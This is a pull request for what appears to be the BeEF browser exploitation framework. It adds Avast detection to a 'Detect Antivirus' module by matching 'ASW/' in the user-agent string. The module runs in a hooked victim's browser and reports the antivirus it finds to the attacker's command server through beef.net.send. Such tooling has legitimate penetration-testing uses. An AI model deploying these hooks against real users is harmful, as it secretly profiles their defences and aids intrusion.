### PR TITLE
add Avast (ASW) detection to the detect_av module

### DIFF
--- a/modules/host/detect_antivirus/command.js
+++ b/modules/host/detect_antivirus/command.js
@@ -20,8 +20,11 @@ beef.execute(function() {
         ka = frm.contentDocument.getElementsByTagName("html")[0].outerHTML;
         var AV = document.getElementById("abs-top-frame");
         var NAV = document.getElementById("coFrameDiv");
+        var ASWregexp = new RegExp("ASW\/");
     //Detection of av elements ends
 
+	if (ASWregexp.test(navigator.userAgent))
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Avast');
     if (ka.indexOf("kasperskylab_antibanner") !== -1)
         beef.net.send('<%= @command_url %>', <%= @command_id %>, 'antivirus=Kaspersky');
     else if (ka.indexOf("netdefender/hui/ndhui.js") !== -1)

--- a/modules/host/detect_antivirus/config.yaml
+++ b/modules/host/detect_antivirus/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             category: "Host"
             name: "Detect Antivirus"
-            description: "This module detect the javascript code automatically included by some AVs (currently supports detection for Kaspersky, Avira, BitDefender, Norton, Dr. Web)"
+            description: "This module detect the javascript code automatically included by some AVs (currently supports detection for Kaspersky, Avira, Avast (ASW), BitDefender, Norton, Dr. Web)"
             authors: ["phosphore","vah13","nbblrr"]
             target:
                 working: ["ALL"]


### PR DESCRIPTION
Avast Safe Zone is the antivirus browser installed with Avast. This commit adds the detection for this UA:
`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 ASW/1.51.2220.62`
Looking for `ASW /` in the ua string.